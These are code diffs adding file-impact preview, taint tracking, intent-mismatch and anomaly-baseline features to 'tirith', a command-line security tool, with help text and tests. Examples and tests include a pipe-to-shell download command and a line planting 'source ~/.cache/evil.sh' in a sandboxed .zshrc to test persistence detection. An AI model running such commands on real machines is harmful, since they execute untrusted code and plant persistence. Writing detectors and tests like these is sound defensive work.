+/// Diff two inventories into `(new_files, modified_files)`, with both lists
+/// sorted and paths rendered relative to `root` for readable output.
+fn diff_inventories(
+    before: &BTreeMap<String, SystemTime>,
+    after: &BTreeMap<String, SystemTime>,
+    root: &Path,
+) -> (Vec<String>, Vec<String>) {
+    let rel = |p: &str| -> String {
+        Path::new(p)
+            .strip_prefix(root)
+            .map(|r| r.to_string_lossy().into_owned())
+            .unwrap_or_else(|_| p.to_string())
+    };
+
+    let mut new_files: Vec<String> = after
+        .keys()
+        .filter(|p| !before.contains_key(*p))
+        .map(|p| rel(p))
+        .collect();
+    new_files.sort();
+
+    let mut modified_files: Vec<String> = after
+        .iter()
+        .filter_map(|(p, mtime_after)| {
+            before
+                .get(p)
+                .filter(|mtime_before| *mtime_before != mtime_after)
+                .map(|_| rel(p))
+        })
+        .collect();
+    modified_files.sort();
+
+    (new_files, modified_files)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::fs;
+
+    #[test]
+    fn banner_states_not_a_sandbox_and_full_privileges() {
+        assert!(NOT_A_SANDBOX_BANNER.contains("not a sandbox"));
+        assert!(NOT_A_SANDBOX_BANNER.contains("full user privileges"));
+        assert!(NOT_A_SANDBOX_BANNER.contains("keychain"));
+        assert_eq!(ISOLATION_KIND, "file_only_not_a_sandbox");
+    }
+
+    #[test]
+    fn copy_repo_excludes_git_directory() {
+        let src = tempfile::tempdir().unwrap();
+        let dst = tempfile::tempdir().unwrap();
+
+        fs::create_dir_all(src.path().join(".git/objects")).unwrap();
+        fs::write(src.path().join(".git/config"), b"[core]").unwrap();
+        fs::write(src.path().join(".git/objects/abc"), b"obj").unwrap();
+        fs::create_dir_all(src.path().join("src")).unwrap();
+        fs::write(src.path().join("src/main.rs"), b"fn main() {}").unwrap();
+        fs::write(src.path().join("README.md"), b"# hi").unwrap();
+
+        let copied = copy_repo_into(src.path(), dst.path()).unwrap();
+        assert_eq!(copied, 2, "should copy main.rs and README.md only");
+        assert!(dst.path().join("src/main.rs").is_file());
+        assert!(dst.path().join("README.md").is_file());
+        assert!(
+            !dst.path().join(".git").exists(),
+            ".git must be excluded from the copy"
+        );
+    }
+
+    #[test]
+    fn diff_reports_new_and_modified_files() {
+        let root = tempfile::tempdir().unwrap();
+        let before = inventory(root.path());
+        assert!(before.is_empty());
+
+        fs::write(root.path().join("created.txt"), b"new").unwrap();
+        let after = inventory(root.path());
+
+        let (new_files, modified_files) = diff_inventories(&before, &after, root.path());
+        assert_eq!(new_files, vec!["created.txt".to_string()]);
+        assert!(modified_files.is_empty());
+    }
+}

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -48,6 +48,49 @@ Examples:
   tirith watch --with-net-hints -- pip install requests
   tirith watch --json -- cargo build";
 
+/// Shared help text for `tirith temp-run` (and its hidden `sandbox-dir`
+/// alias). The honesty banner here is the SAME wording carried by the human
+/// output banner, the JSON `disclaimer` field, and `docs/threat-model.md` —
+/// pinned together by `help_snapshots.rs::help_temp_run`.
+const TEMP_RUN_AFTER_HELP: &str = "\
+FILE ISOLATION ONLY; NOT A SANDBOX.
+  The command runs with full user privileges and can read your keychain, ssh
+  keys, AWS creds, and the network. Use this for filesystem-impact preview
+  ONLY. The ONLY thing temp-run changes is the working directory: the command
+  starts in a fresh mkdtemp dir, so files it WRITES land there instead of your
+  tree, and you get a diff of what it touched. Runtime sandboxing is an explicit
+  tirith non-goal (see docs/threat-model.md) — temp-run is a file-isolation
+  workflow, not a containment boundary.
+
+What this does:
+  mkdtemp → (optionally seed) → run the command there → diff the temp dir for
+  new / modified files → prompt to delete or keep (default keep + print the
+  path when non-interactive).
+
+  --copy-repo   Seed the temp dir with a copy of the current repo, EXCLUDING
+                .git/. Off by default (copying a large tree is slow); the
+                default is an empty temp dir. Pure walkdir + fs::copy — no
+                `cp --exclude` (GNU-only) dependency.
+  --strip-env   Clear the child's environment and re-add only an allowlist
+                (HOME, PATH, USER, LANG, TERM). A convenience knob, NOT secret
+                scrubbing — a stripped env is still not a security boundary.
+                Pure Command::env_clear() — no `env -i` (non-portable) shell-out.
+
+Exit code:
+  The watched command's own exit code (so `temp-run -- false` exits 1), except
+  a usage error (2) or a setup/spawn failure (2). The filesystem diff is
+  reported but never overrides the child's exit code.
+
+JSON:
+  Every --json envelope carries `\"isolation_kind\": \"file_only_not_a_sandbox\"`
+  so a downstream consumer can never mistake this for a security boundary.
+
+Examples:
+  tirith temp-run -- ./script.sh
+  tirith temp-run --copy-repo -- make build
+  tirith temp-run --strip-env -- ./untrusted-installer.sh
+  tirith temp-run --json -- npm install left-pad";
+
 #[derive(Subcommand)]
 enum Commands {
     /// Manage the tirith background daemon
@@ -1933,6 +1976,57 @@ Examples:
         json: bool,
 
         /// The command to run and watch (everything after `--`)
+        #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
+        command: Vec<String>,
+    },
+
+    /// Run a command in a throwaway temp dir and diff its file impact (M10 ch6)
+    ///
+    /// FILE ISOLATION ONLY — NOT a sandbox. The command runs with your full
+    /// privileges (keychain, ssh keys, cloud creds, network). The only thing
+    /// changed is the working directory. See `tirith temp-run --help`.
+    #[command(after_help = TEMP_RUN_AFTER_HELP)]
+    TempRun {
+        /// Seed the temp dir with a copy of the current repo, EXCLUDING .git/.
+        /// Off by default (the default is an empty temp dir) — copying a large
+        /// tree is slow. Pure walkdir + fs::copy; no `cp --exclude`.
+        #[arg(long)]
+        copy_repo: bool,
+
+        /// Clear the child's environment and re-add only an allowlist (HOME,
+        /// PATH, USER, LANG, TERM). A convenience knob, NOT secret scrubbing.
+        /// Pure Command::env_clear(); no non-portable `env -i` shell-out.
+        #[arg(long)]
+        strip_env: bool,
+
+        /// Output the run + file diff as JSON. The envelope always carries
+        /// `"isolation_kind": "file_only_not_a_sandbox"`.
+        #[arg(long)]
+        json: bool,
+
+        /// The command to run in the temp dir (everything after `--`)
+        #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
+        command: Vec<String>,
+    },
+
+    /// Hidden alias for `temp-run` (the spec's `sandbox-dir` word). The
+    /// canonical name is `temp-run` to avoid "sandbox" implying a boundary it
+    /// does not have; this exists only for discoverability and is identical.
+    #[command(name = "sandbox-dir", hide = true, after_help = TEMP_RUN_AFTER_HELP)]
+    SandboxDir {
+        /// Seed the temp dir with a .git-excluded copy of the repo (off by default).
+        #[arg(long)]
+        copy_repo: bool,
+
+        /// Clear the child env and re-add only HOME, PATH, USER, LANG, TERM.
+        #[arg(long)]
+        strip_env: bool,
+
+        /// Output JSON (carries `"isolation_kind": "file_only_not_a_sandbox"`).
+        #[arg(long)]
+        json: bool,
+
+        /// The command to run in the temp dir (everything after `--`)
         #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
         command: Vec<String>,
     },
@@ -6054,6 +6148,19 @@ fn run() {
                 cli::baseline::reset(yes, json)
             }
         },
+        // `temp-run` and its hidden `sandbox-dir` alias share one impl.
+        Commands::TempRun {
+            copy_repo,
+            strip_env,
+            json,
+            command,
+        }
+        | Commands::SandboxDir {
+            copy_repo,
+            strip_env,
+            json,
+            command,
+        } => cli::temp_run::run(&command, copy_repo, strip_env, json),
     };
 
     std::process::exit(exit_code);

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -1932,8 +1932,12 @@ reflect the cwd at the time you run the preview.
 
 Exit codes:
   0  no concerns
-  1  HIGH impact (system path / outside repo / empty-variable glob)
+  1  HIGH impact (system path / outside repo / a $VAR/ glob whose variable is
+     set-but-empty)
   2  review recommended (find -delete / rsync --delete / symlinks)
+
+A $VAR/ glob whose variable is merely ABSENT from tirith's environment is
+advisory (Info, exit 0): it may be a benign shell-local tirith cannot see.
 
 Examples:
   tirith preview -- \"rm -rf ./dist\"

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -565,15 +565,35 @@ Built-in --profile values:
         profile: Option<String>,
     },
 
-    /// Check a URL for server-side cloaking (different content for bots vs browsers)
+    /// Check a URL for server-side cloaking, or download-and-keep with --save
     #[cfg(unix)]
     #[command(after_help = "\
+Without --save: checks the URL for server-side cloaking (different content
+served to bots vs browsers).
+
+With --save <path>: downloads the URL to <path> (without executing it) and
+marks that path TAINTED in the local taint store. A later `bash <path>` or
+`source <path>` then fires the engine's tainted-file rule. This is the
+download-and-keep half of `tirith run` — `run` executes from a temp file that
+is normally cleaned up, so it never taints a stable path; `fetch --save` keeps
+the file at a path YOU choose and taints exactly that path.
+
 Examples:
   tirith fetch https://example.com/install.sh
-  tirith fetch --format json https://example.com/install.sh")]
+  tirith fetch --format json https://example.com/install.sh
+  tirith fetch --save ./install.sh https://untrusted.example/install.sh
+  tirith fetch --save ./install.sh --sha256 abc123 https://untrusted.example/install.sh")]
     Fetch {
-        /// URL to check for cloaking
+        /// URL to check for cloaking (or to download when --save is set)
         url: String,
+
+        /// Download the URL to this path and mark it tainted (no execution)
+        #[arg(long, value_name = "PATH")]
+        save: Option<String>,
+
+        /// With --save: expected SHA-256 of the download (abort on mismatch)
+        #[arg(long, requires = "save")]
+        sha256: Option<String>,
 
         /// Output format (default: human)
         #[arg(long, value_enum)]
@@ -1915,6 +1935,93 @@ Examples:
         /// The command to run and watch (everything after `--`)
         #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
         command: Vec<String>,
+    },
+
+    /// Track files downloaded from risky sources (tainted-content) (M10 ch3)
+    #[command(after_help = "\
+A file becomes tainted when you download-and-keep it from an untrusted source.
+The mark is stored in a path-keyed JSONL file at <state-dir>/taint.jsonl. When
+a later command executes that exact path (`bash ./install.sh`) or sources it
+(`source ./env.sh`), the engine fires ExecOfTaintedFile (High) /
+CommandSourcedFromTaintedFile (Medium).
+
+How a file gets tainted:
+  tirith fetch --save ./install.sh https://untrusted.example/install.sh
+
+Limitations:
+  The store is PATH-KEYED — `mv ./install.sh ./run.sh` loses the mark. The mark
+  is NEVER auto-cleared by `chmod +x` or a `bash -n` parse check; only an
+  explicit `tirith taint clear` removes it.
+
+Examples:
+  tirith taint list
+  tirith taint list --json
+  tirith taint explain ./install.sh
+  tirith taint clear ./install.sh
+  tirith taint clear ./install.sh --yes")]
+    Taint {
+        #[command(subcommand)]
+        action: TaintAction,
+    },
+}
+
+#[derive(Subcommand)]
+enum TaintAction {
+    /// List every recorded tainted file
+    #[command(after_help = "\
+Examples:
+  tirith taint list
+  tirith taint list --json")]
+    List {
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json.
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+
+    /// Show the recorded taint mark for one file (where it came from)
+    #[command(after_help = "\
+Exit codes:
+  0  the file is NOT tainted.
+  1  the file IS tainted (review it, then `tirith taint clear <file>`).
+
+Examples:
+  tirith taint explain ./install.sh
+  tirith taint explain ./install.sh --json")]
+    Explain {
+        /// Path to inspect.
+        file: String,
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json.
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+
+    /// Remove the taint mark for one file (prompts for confirmation)
+    #[command(after_help = "\
+Prompts before removing the mark unless --yes is passed. In a non-interactive
+shell without --yes the removal is refused (no silent clear). In --json mode,
+--yes is required to confirm.
+
+Examples:
+  tirith taint clear ./install.sh
+  tirith taint clear ./install.sh --yes")]
+    Clear {
+        /// Path whose taint mark to remove.
+        file: String,
+        /// Skip the confirmation prompt.
+        #[arg(long)]
+        yes: bool,
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json.
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
     },
 }
 
@@ -4715,9 +4822,18 @@ fn run() {
         }
 
         #[cfg(unix)]
-        Commands::Fetch { url, format, json } => {
+        Commands::Fetch {
+            url,
+            save,
+            sha256,
+            format,
+            json,
+        } => {
             let (_, json) = HumanJsonFormat::resolve(format, json);
-            cli::fetch::run(&url, json)
+            match save {
+                Some(path) => cli::fetch::save(&url, &path, sha256, json),
+                None => cli::fetch::run(&url, json),
+            }
         }
 
         Commands::Fix {
@@ -5734,6 +5850,25 @@ fn run() {
             // Identical impl to `tirith checkpoint watch` (CheckpointAction::Watch).
             cli::checkpoint::watch(&command, &paths, with_net_hints, json)
         }
+        Commands::Taint { action } => match action {
+            TaintAction::List { format, json } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::taint::list(json)
+            }
+            TaintAction::Explain { file, format, json } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::taint::explain(&file, json)
+            }
+            TaintAction::Clear {
+                file,
+                yes,
+                format,
+                json,
+            } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::taint::clear(&file, yes, json)
+            }
+        },
     };
 
     std::process::exit(exit_code);

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -1815,6 +1815,48 @@ Examples:
         #[command(subcommand)]
         action: HooksAction,
     },
+
+    /// Preview the blast radius of a destructive command (M10 ch1)
+    #[command(after_help = "\
+What this does:
+  Simulates the filesystem impact of a destructive command (rm / mv / chmod -R /
+  find … -delete / rsync --delete) WITHOUT running it. Walks the target tree
+  (depth <= 5, <= 100k files), expands globs against the current directory, and
+  reports file / dir / symlink counts, the largest file, whether any target
+  escapes the repo, and whether it writes a system path.
+
+What this is NOT:
+  - It does NOT execute the command. It only counts impact.
+  - It is NOT a sandbox or a security boundary. It reads the disk to count
+    impact and then exits.
+  - It is the ONLY tirith surface that walks the filesystem. `tirith check`
+    NEVER walks the disk — it runs only the cheap string-shape blast-radius
+    checks on the hot path.
+
+Globs expand against the current working directory, so the reported counts
+reflect the cwd at the time you run the preview.
+
+Exit codes:
+  0  no concerns
+  1  HIGH impact (system path / outside repo / empty-variable glob)
+  2  review recommended (find -delete / rsync --delete / symlinks)
+
+Examples:
+  tirith preview -- \"rm -rf ./dist\"
+  tirith preview --json -- \"find . -type f -delete\"
+  tirith preview -- \"rsync -a --delete src/ dst/\"")]
+    Preview {
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+
+        /// The destructive command to simulate
+        #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
+        command: Vec<String>,
+    },
 }
 
 #[derive(Subcommand)]
@@ -5578,6 +5620,14 @@ fn run() {
                 cli::hooks::explain(&name, json)
             }
         },
+        Commands::Preview {
+            format,
+            json,
+            command,
+        } => {
+            let (_, json) = HumanJsonFormat::resolve(format, json);
+            cli::preview::run(&command.join(" "), json)
+        }
     };
 
     std::process::exit(exit_code);

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -1963,6 +1963,68 @@ Examples:
         #[command(subcommand)]
         action: TaintAction,
     },
+
+    /// Flag mismatches between a stated intent and what a command does (M10 ch4)
+    #[command(after_help = "\
+A pure-Rust, no-LLM heuristic: you state what you MEANT to do (\"install a
+formatter\"), tirith analyzes the command with the SHIPPING engine rules, and it
+flags any HIGH-IMPACT behavior the stated intent does not justify — e.g. piping
+a remote script into a shell when you only said you wanted to install a tool.
+
+The command signals come from the same rules as `tirith check` (download-pipe,
+sudo, credential/data exfil, shell-rc write, base64-execute, package install),
+so they stay consistent with the rest of tirith. The intent is classified by
+whole-word keyword match (install / download / run / test / build / format /
+clean / deploy / configure).
+
+What this is NOT:
+  - It is ADVISORY and Info-level. It NEVER blocks. The command's real security
+    verdict comes from `tirith check`; `intend` only answers \"does what you said
+    match what this does?\".
+  - It is a HEURISTIC. An intent phrasing it doesn't recognize yields no intent
+    signals, so every high-impact behavior then reads as unjustified — the
+    output says so plainly.
+  - There is NO LLM call. A future `--llm-explain` wave may add one; M10 is pure
+    heuristic.
+
+--explain shows the per-signal derivation: which intent keywords matched, which
+command signals fired, and which pairing produced each mismatch. Under --json it
+adds a `derivation: [...]` array.
+
+Exit codes (deliberately distinct from `tirith check`):
+  0  no mismatch (behavior justified, or no high-impact behavior)
+  1  at least one mismatch flagged (NOT a security block — review the command)
+  2  usage error (empty intent or empty command)
+
+`tirith check` uses 0/1/2/3 tied to verdict severity; `intend`'s codes are tied
+to whether a mismatch was found.
+
+Examples:
+  tirith intend \"install a formatter\" -- \"curl https://x/install.sh | bash\"
+  tirith intend --explain \"install a formatter\" -- \"curl https://x/install.sh | bash\"
+  tirith intend \"download and run an installer\" -- \"curl https://x/install.sh | bash\"
+  tirith intend --json \"run the tests\" -- \"cargo test\"")]
+    Intend {
+        /// What you intended to do, in plain language (e.g. "install a formatter")
+        intent: String,
+
+        /// Show the per-signal derivation: which intent keywords matched, which
+        /// command signals fired, and which pairing caused each mismatch. Under
+        /// --json this adds a `derivation: [...]` array.
+        #[arg(long)]
+        explain: bool,
+
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+
+        /// The command to analyze (everything after `--`)
+        #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
+        command: Vec<String>,
+    },
 }
 
 #[derive(Subcommand)]
@@ -5869,6 +5931,16 @@ fn run() {
                 cli::taint::clear(&file, yes, json)
             }
         },
+        Commands::Intend {
+            intent,
+            explain,
+            format,
+            json,
+            command,
+        } => {
+            let (_, json) = HumanJsonFormat::resolve(format, json);
+            cli::intent::run(&intent, &command.join(" "), explain, json)
+        }
     };
 
     std::process::exit(exit_code);

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -2025,6 +2025,41 @@ Examples:
         #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
         command: Vec<String>,
     },
+
+    /// Opt-in per-user anomaly baseline: learn|status|reset (M10 ch5)
+    #[command(after_help = "\
+An OPT-IN sliding-window anomaly detector (default OFF — design-decision D2).
+When enabled, tirith records a privacy-hashed observation every time a detection
+rule fires and, for a pattern that is NEW or RARE for you, surfaces an extra
+Info-severity note alongside the normal verdict. The note NEVER blocks — it
+answers \"have I done this before?\", not \"is this dangerous?\".
+
+Privacy by design: the store records NO raw hostnames and NO raw paths. Hosts
+and the repo root are salted-sha256 hashed (per-install salt at
+<state-dir>/baseline.salt, mode 0600); ecosystem and the sudo flag are
+low-cardinality categoricals. The tuple is
+(rule_id, host-hash, ecosystem, sudo, cwd/repo-hash). The store lives at
+<state-dir>/baseline.jsonl, a 90-day window capped at 100k entries.
+
+Early-baseline mode: until the window holds ~30 observations, everything looks
+new — anomaly signals are not yet meaningful. `tirith doctor` and
+`tirith baseline status` say so.
+
+Subcommands:
+  learn   turn the baseline ON (sets policy.baseline_enabled = true)
+  status  show the top 20 patterns (privacy-hashed) + the enabled flag
+  reset   zero the store (prompts unless --yes)
+
+Examples:
+  tirith baseline learn
+  tirith baseline status
+  tirith baseline status --json
+  tirith baseline reset
+  tirith baseline reset --yes")]
+    Baseline {
+        #[command(subcommand)]
+        action: BaselineAction,
+    },
 }
 
 #[derive(Subcommand)]
@@ -2075,6 +2110,70 @@ Examples:
     Clear {
         /// Path whose taint mark to remove.
         file: String,
+        /// Skip the confirmation prompt.
+        #[arg(long)]
+        yes: bool,
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json.
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+}
+
+#[derive(Subcommand)]
+enum BaselineAction {
+    /// Turn the opt-in anomaly baseline ON (sets policy.baseline_enabled = true)
+    #[command(after_help = "\
+Enables learning. After this, tirith records a privacy-hashed observation for
+every detection-rule firing and surfaces an Info 'first time / rare for you'
+note for novel patterns. No raw hostnames or paths are stored — only salted
+hashes. It never blocks. Expect early-baseline mode (everything looks new)
+until the window fills in.
+
+Examples:
+  tirith baseline learn
+  tirith baseline learn --json")]
+    Learn {
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json.
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+
+    /// Show the top 20 patterns (privacy-hashed) and the enabled flag
+    #[command(after_help = "\
+Prints whether the baseline is enabled, how many observations are in the 90-day
+window, an early-baseline-mode note while the window is sparse, and the top 20
+patterns by count. All identifying fields are salted-sha256 hashes — never raw
+hostnames or paths.
+
+Examples:
+  tirith baseline status
+  tirith baseline status --json")]
+    Status {
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json.
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+
+    /// Zero the baseline store (prompts for confirmation)
+    #[command(after_help = "\
+Removes every recorded observation. Prompts before zeroing unless --yes is
+passed. In a non-interactive shell without --yes the reset is refused (no silent
+zero). In --json mode, --yes is required to confirm. The per-install salt is
+left in place.
+
+Examples:
+  tirith baseline reset
+  tirith baseline reset --yes")]
+    Reset {
         /// Skip the confirmation prompt.
         #[arg(long)]
         yes: bool,
@@ -5941,6 +6040,20 @@ fn run() {
             let (_, json) = HumanJsonFormat::resolve(format, json);
             cli::intent::run(&intent, &command.join(" "), explain, json)
         }
+        Commands::Baseline { action } => match action {
+            BaselineAction::Learn { format, json } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::baseline::learn(json)
+            }
+            BaselineAction::Status { format, json } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::baseline::status(json)
+            }
+            BaselineAction::Reset { yes, format, json } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::baseline::reset(yes, json)
+            }
+        },
     };
 
     std::process::exit(exit_code);

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -17,6 +17,37 @@ pub struct Cli {
     command: Commands,
 }
 
+/// Shared help text for the two `watch` spellings (`tirith watch …` and
+/// `tirith checkpoint watch …`) so both surfaces document the identical
+/// behavior and honesty caveats.
+const WATCH_AFTER_HELP: &str = "\
+What this does:
+  Snapshots the current directory (plus any --paths) and your runtime state
+  (env var names, $PATH, shell-rc file hashes), runs the command, then
+  re-snapshots and reports: new files, modified files, $PATH additions, env
+  vars added, and shell-rc modifications. A shell rc/profile file changed
+  DURING the run fires a HIGH `post_run_shell_rc_modified` finding.
+
+What this is NOT:
+  - It does NOT sandbox or isolate the command. The command runs with your
+    FULL privileges and can read your keychain, ssh keys, cloud creds, and the
+    network. `watch` is an after-the-fact LENS, not a gate or a boundary.
+  - It does NOT block. The exit code is the watched command's own exit code.
+  - File snapshotting is capped to the current directory and any --paths you
+    pass — it never walks all of $HOME.
+
+--with-net-hints (EXPERIMENTAL, off by default):
+  Emits best-effort network hints derived from a resolver-cache / log mtime
+  delta. Best-effort hints ONLY — may miss QUIC/UDP/direct-IP; NOT a network
+  monitor; not a security boundary. Absence of hints does NOT mean no network
+  activity occurred.
+
+Examples:
+  tirith watch -- npm install left-pad
+  tirith watch --paths ~/.config -- ./install.sh
+  tirith watch --with-net-hints -- pip install requests
+  tirith watch --json -- cargo build";
+
 #[derive(Subcommand)]
 enum Commands {
     /// Manage the tirith background daemon
@@ -1857,6 +1888,34 @@ Examples:
         #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
         command: Vec<String>,
     },
+
+    /// Run a command and diff its filesystem / $PATH / shell-rc impact (M10 ch2)
+    ///
+    /// Shortcut for `tirith checkpoint watch` — both dispatch to one impl.
+    #[command(after_help = WATCH_AFTER_HELP)]
+    Watch {
+        /// Extra paths to snapshot for file changes, in addition to the current
+        /// directory. Repeat the flag for multiple paths.
+        #[arg(long = "paths")]
+        paths: Vec<String>,
+
+        /// EXPERIMENTAL, off by default: emit best-effort network hints from a
+        /// resolver-cache / log mtime delta. May miss QUIC/UDP/direct-IP
+        /// entirely; NOT a network monitor and not a security boundary.
+        #[arg(long)]
+        with_net_hints: bool,
+
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+
+        /// The command to run and watch (everything after `--`)
+        #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
+        command: Vec<String>,
+    },
 }
 
 #[derive(Subcommand)]
@@ -3328,6 +3387,32 @@ Examples:
         /// Alias for --format json
         #[arg(long, hide = true, conflicts_with = "format")]
         json: bool,
+    },
+    /// Snapshot, run a command, then diff (post-run blast-radius). Same impl as
+    /// the top-level `tirith watch`.
+    #[command(after_help = WATCH_AFTER_HELP)]
+    Watch {
+        /// Extra paths to snapshot for file changes, in addition to the current
+        /// directory. Repeat the flag for multiple paths.
+        #[arg(long = "paths")]
+        paths: Vec<String>,
+
+        /// EXPERIMENTAL, off by default: emit best-effort network hints from a
+        /// resolver-cache / log mtime delta. May miss QUIC/UDP/direct-IP
+        /// entirely; NOT a network monitor and not a security boundary.
+        #[arg(long)]
+        with_net_hints: bool,
+
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+
+        /// The command to run and watch (everything after `--`)
+        #[arg(allow_hyphen_values = true, trailing_var_arg = true)]
+        command: Vec<String>,
     },
 }
 
@@ -4901,6 +4986,16 @@ fn run() {
                 let (_, json) = HumanJsonFormat::resolve(format, json);
                 cli::checkpoint::purge_checkpoints(json)
             }
+            CheckpointAction::Watch {
+                paths,
+                with_net_hints,
+                format,
+                json,
+                command,
+            } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::checkpoint::watch(&command, &paths, with_net_hints, json)
+            }
         },
 
         Commands::Activate { key } => cli::license_cmd::activate(&key),
@@ -5627,6 +5722,17 @@ fn run() {
         } => {
             let (_, json) = HumanJsonFormat::resolve(format, json);
             cli::preview::run(&command.join(" "), json)
+        }
+        Commands::Watch {
+            paths,
+            with_net_hints,
+            format,
+            json,
+            command,
+        } => {
+            let (_, json) = HumanJsonFormat::resolve(format, json);
+            // Identical impl to `tirith checkpoint watch` (CheckpointAction::Watch).
+            cli::checkpoint::watch(&command, &paths, with_net_hints, json)
         }
     };
 

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -8350,3 +8350,92 @@ fn temp_run_smoke_true_emits_isolation_kind() {
         let _ = fs::remove_dir_all(PathBuf::from(p));
     }
 }
+
+/// F1 + pr-test-analyzer #6: `tirith watch` ALWAYS runs the after-snapshot and
+/// diff once the child returns, surfaces a `.zshrc` persistence-line write as the
+/// High `PostRunShellRcModified` finding, preserves the CHILD's exit code, and
+/// reports `interrupted: false` on a normal (non-signalled) run. Drives the
+/// top-level `watch` spelling against a controlled HOME so the test never
+/// touches the real shell-rc files.
+#[cfg(unix)]
+#[test]
+fn watch_reports_shell_rc_modification_and_preserves_exit_code() {
+    let home = tempfile::tempdir().expect("home");
+    let workdir = tempfile::tempdir().expect("workdir");
+    let zshrc = home.path().join(".zshrc");
+    fs::write(&zshrc, "alias ll='ls -la'\n").unwrap();
+
+    // The watched command appends a persistence line to ~/.zshrc, then exits 3
+    // (a distinct non-zero code we assert is preserved).
+    let cmd = "printf 'source ~/.cache/evil.sh\\n' >> \"$HOME/.zshrc\"; exit 3";
+
+    let out = tirith()
+        .args(["watch", "--json", "--", cmd])
+        .current_dir(workdir.path())
+        .env("HOME", home.path())
+        .env("SHELL", "/bin/sh")
+        .output()
+        .expect("failed to run tirith watch");
+
+    // The child's exit code (3) is preserved — watch is a lens, not a gate.
+    assert_eq!(
+        out.status.code(),
+        Some(3),
+        "watch must surface the child's exit code, got stderr: {}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("watch --json should be valid JSON");
+
+    // The after-diff ran even though the child exited non-zero.
+    let modified_rc = json["shell_rc_modified"]
+        .as_array()
+        .expect("shell_rc_modified array");
+    assert!(
+        modified_rc.iter().any(|v| v == ".zshrc"),
+        "the modified .zshrc must be reported, got: {modified_rc:?}"
+    );
+
+    let findings = json["findings"].as_array().expect("findings array");
+    assert!(
+        findings
+            .iter()
+            .any(|f| f["rule_id"] == "post_run_shell_rc_modified"),
+        "a PostRunShellRcModified finding must fire, got: {findings:?}"
+    );
+
+    // Normal (non-signalled) run → not interrupted.
+    assert_eq!(
+        json["interrupted"], false,
+        "a normally-exiting run must report interrupted=false"
+    );
+}
+
+/// pr-test-analyzer #6: the namespaced `checkpoint watch` spelling must produce
+/// the same JSON envelope and preserve the child exit code (here 0).
+#[cfg(unix)]
+#[test]
+fn checkpoint_watch_alias_matches_envelope_and_exit() {
+    let home = tempfile::tempdir().expect("home");
+    let workdir = tempfile::tempdir().expect("workdir");
+    fs::write(home.path().join(".bashrc"), "export EDITOR=vim\n").unwrap();
+
+    let out = tirith()
+        .args(["checkpoint", "watch", "--json", "--", "true"])
+        .current_dir(workdir.path())
+        .env("HOME", home.path())
+        .env("SHELL", "/bin/sh")
+        .output()
+        .expect("failed to run tirith checkpoint watch");
+
+    assert_eq!(out.status.code(), Some(0), "`true` exits 0");
+
+    let json: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("checkpoint watch --json valid JSON");
+    // Same envelope keys as the top-level spelling.
+    assert!(json.get("shell_rc_modified").is_some());
+    assert!(json.get("new_files").is_some());
+    assert_eq!(json["interrupted"], false);
+    assert_eq!(json["exit_code"], 0);
+}

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
